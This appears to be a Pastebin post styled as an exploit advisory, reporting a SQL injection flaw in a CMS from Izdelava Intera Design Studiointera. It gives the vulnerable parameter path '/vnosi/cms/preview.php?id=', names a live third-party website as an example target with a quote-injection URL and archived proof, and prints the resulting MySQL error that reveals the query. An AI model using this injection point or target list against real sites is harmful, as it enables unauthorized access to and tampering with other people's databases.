KingSkrupellos

Izdelava Intera Design Studiointera SQL Injection

Mar 28th, 2019
90
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 2.25 KB | None | 0 0
  1. ######################################################################
  2.  
  3. # Exploit Title : Izdelava Intera Design Studiointera SQL Injection
  4. # Author [ Discovered By ] : KingSkrupellos
  5. # Team : Cyberizm Digital Security Army
  6. # Date : 28/03/2019
  7. # Vendor Homepage : studiointera.net
  8. # Tested On : Windows and Linux
  9. # Category : WebApps
  10. # Exploit Risk : Medium
  11. # Vulnerability Type : CWE-89 [ Improper Neutralization of
  12. Special Elements used in an SQL Command ('SQL Injection') ]
  13. # PacketStormSecurity : packetstormsecurity.com/files/authors/13968
  14. # CXSecurity : cxsecurity.com/author/KingSkrupellos/1/
  15. # Exploit4Arab : exploit4arab.org/author/351/KingSkrupellos
  16. # Reference Link : cxsecurity.com/issue/WLB-2019030232
  17.  
  18. ######################################################################
  19.  
  20. # Impact :
  21. ***********
  22. Izdelava Intera Design Studiointera is prone to an SQL-injection vulnerability because
  23.  
  24. it fails to sufficiently sanitize user-supplied data before using it in an SQL query.
  25.  
  26. Exploiting this issue could allow an attacker to compromise the application, access
  27.  
  28. or modify data, or exploit latent vulnerabilities in the underlying database. A remote attacker
  29.  
  30. can send a specially crafted request to the vulnerable application and execute arbitrary
  31.  
  32. SQL commands in application`s database. Further exploitation of this vulnerability may result
  33.  
  34. in unauthorized data manipulation. An attacker can exploit this issue using a browser.
  35.  
  36. ######################################################################
  37.  
  38. # SQL Injection Exploit :
  39. **********************
  40. /vnosi/cms/preview.php?id=[SQL Injection]
  41.  
  42. ######################################################################
  43.  
  44. # Example Vulnerable Sites :
  45. *************************
  46. [+] gspostojna.net/vnosi/cms/preview.php?id=9%27 => [ Proof ] => archive.is/h49zG
  47.  
  48. ######################################################################
  49.  
  50. # Example SQL Database Error :
  51. ****************************
  52. MySQL query errorSELECT * FROM cms_pages WHERE id='9'' ORDER BY id LIMIT 1
  53.  
  54. ######################################################################
  55.  
  56. # Discovered By KingSkrupellos from Cyberizm.Org Digital Security Team
  57.  
  58. ######################################################################
Add Comment
Please, Sign In to add comment